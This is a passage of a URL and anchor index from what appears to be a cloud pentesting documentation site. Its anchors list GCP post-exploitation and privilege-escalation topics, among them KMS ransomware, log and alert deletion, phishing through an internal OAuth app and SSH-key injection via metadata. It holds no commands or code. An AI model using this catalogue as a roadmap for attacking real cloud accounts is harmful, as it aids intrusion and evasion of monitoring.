,"pentesting-cloud/gcp-security/gcp-basic-information/index.html#access-scopes","pentesting-cloud/gcp-security/gcp-basic-information/index.html#terraform-iam-policies-bindings-and-memberships","pentesting-cloud/gcp-security/gcp-basic-information/index.html#references","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp---federation-abuse","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#oidc---github-actions-abuse","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#github","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#gcp---permissions-for-a-pentest","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#individual-tools-permissions","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#purplepanda","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#scoutsuite","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cloudsploit","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cartography","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#starbase","pentesting-cloud/gcp-security/gcp-post-exploitation/index.html#gcp---post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#gcp---app-engine-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#app-engine","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#appenginememcacheaddkey--appenginememcachelist--appenginememcachegetkey--appenginememcacheflush","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#loggingviewsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#read-source-code","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#modify-source-code","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#gcp---artifact-registry-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#artifact-registry","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#privesc","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#gcp---cloud-build-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloud-build","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloudbuildbuildsapprove","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#gcp---cloud-functions-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloud-functions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloudfunctionsfunctionssourcecodeget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#steal-cloud-function-requests","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#gcp---cloud-run-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#cloud-run","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#access-the-images","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#modify--redeploy-the-image","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#gcp---cloud-shell-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#cloud-shell","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#container-escape","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#use-it-as-proxy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#gcp---cloud-sql-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloud-sql","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesupdate--cloudsqlinstancesget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlusersupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesrestorebackup-cloudsqlbackuprunsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlbackuprunsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesexport-storageobjectscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesimport-storageobjectsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqldatabasesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#gcp---compute-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#compute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#export--inspect-images-locally","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#export--inspect-snapshots--disks-locally","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#inspect-an-image-creating-a-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#inspect-a-snapshotdisk-attaching-it-to-a-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#gcp---filestore-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#mount-filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#remove-restrictions-and-get-extra-permissions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#restore-a-backup","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#create-a-backup-and-restore-it","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#gcp---iam-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#iam","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#granting-access-to-management-console","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#gcp---kms-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsdestroy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoencrypt--cloudkmscryptokeyversionsusetoencryptviadelegation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetosign","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoverify","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#gcp---logging-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#basic-information","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#default-logging","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#add-excepted-principal","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#read-logs---logginglogentrieslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#write-logs---logginglogentriescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#gcp---monitoring-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoring","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#gcp---pubsub-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsub","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicspublish","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdetachsubscription","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionscreate-pubsubtopicsattachsubscription--pubsubsubscriptionsconsume","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasattach-pubsubtopicsupdatepubsubschemascreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemassetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsnapshotscreate-pubsubsnapshotsseek","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#gcp---secretmanager-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanager","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanagerversionsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#gcp---security-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#security","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsbulkmuteupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingssetmute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#gcp---workflows-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#workflow","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#gcp---storage-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#cloud-storage","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#give-public-access","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#gcp---privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#introduction-to-gcp-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#permissions-for-privilege-escalation-methodology","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#bypassing-access-scopes","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#privilege-escalation-techniques","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#abusing-gcp-to-escalate-privileges-locally","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#gcp---apikeys-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeys","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#brute-force-api-key-access","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysgetkeystring--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysundelete--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#create-internal-oauth-application-to-phish-other-workers","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#gcp---appengine-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#app-engine","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsget-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineoperationslist-appengineservicesget-appengineserviceslist-appengineversionscreate-appengineversionsget-appengineversionslist-cloudbuildbuildsgetiamserviceaccountsactas-resourcemanagerprojectsget-storageobjectscreate-storageobjectslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#update-equivalent-permissions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineinstancesenabledebug-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineservicesget-appengineserviceslist-appengineversionsget-appengineversionslist-computeprojectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsupdate-appengineoperationsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineversionsgetfilecontents-appengineversionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#write-access-over-the-buckets","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#write-access-over-the-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#gcp---artifact-registry-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifactregistryrepositoriesuploadartifacts","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#gcp---batch-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batch","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batchjobscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#gcp---bigquery-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquery","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#read-table","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#export-data","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#insert-data","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetsupdate-bigquerydatasetsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerytablessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigqueryrowaccesspoliciesupdate-bigqueryrowaccesspoliciessetiampolicy-bigquerytablesgetdata-bigqueryjobscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#gcp---clientauthconfig-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#create-oauth-brand-and-client","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#gcp---cloudbuild-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuild","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadwritetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildconnectionsfetchlinkablerepositories","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#gcp---cloudfunctions-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionscreate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssourcecodeset","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssetiampolicy--iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#read--write-access-over-the-bucket","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#read--write-access-over-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#gcp---cloudidentity-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#cloudidentity","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#add-yourself-to-a-group","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#modify-group-membership","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#gcp---cloud-scheduler-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloud-scheduler","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobscreate--iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobsupdate--iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#gcp---cloud-tasks-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#cloud-tasks","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#cloudtaskstaskscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#cloudtaskstasksrun-cloudtaskstaskslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#cloudtasksqueuessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#gcp---compute-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#compute","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeprojectssetcommoninstancemetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetmetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesoslogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesosadminlogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancescreateiamserviceaccountsactas-computediskscreate-computeinstancescreate-computeinstancessetmetadata-computeinstancessetserviceaccount-computesubnetworksuse-computesubnetworksuseexternalip","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#osconfigpatchdeploymentscreate--osconfigpatchjobsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computemachineimagessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computesnapshotssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computediskssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#bypass-access-scopes","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#local-privilege-escalation-in-gcp-compute-instance","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---add-custom-ssh-metadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#modifying-the-metadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#incorporation-of-ssh-keys-into-custom-metadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#add-ssh-key-to-existing-privileged-user","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#create-a-new-privileged-user-and-add-a-ssh-key","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#ssh-keys-at-project-level","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#gcp---composer-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#download-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#import-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#write-access-to-the-composer-bucket","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#import-plugins","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#import-data","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#gcp---container-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#container","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerclustersget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesescalate--containerclusterrolesescalate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesbind--containerclusterrolesbind","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containercronjobscreate--containercronjobsupdate--containerdaemonsetscreate--containerdaemonsetsupdate--containerdeploymentscreate--containerdeploymentsupdate--containerjobscreate--containerjobsupdate--containerpodscreate--containerpodsupdate--containerreplicasetscreate--containerreplicasetsupdate--containerreplicationcontrollerscreate--containerreplicationcontrollersupdate--containerscheduledjobscreate--containerscheduledjobsupdate--containerstatefulsetscreate--containerstatefulsetsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containersecretsget--containersecretslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsportforward","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerserviceaccountscreatetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containermutatingwebhookconfigurationscreate--containermutatingwebhookconfigurationsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#gcp-dataproc-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataproc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataprocclustersget-dataprocclustersuse-dataprocjobscreate-dataprocjobsget-dataprocjobslist-storageobjectscreate-storageobjectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#gcp---deploymentmaneger-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#gcp---iam-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iam","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamrolesupdate-iamrolesget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsgetaccesstoken-iamserviceaccountsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountkeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsimplicitdelegation","pentesting-cloud/gcp-security/gc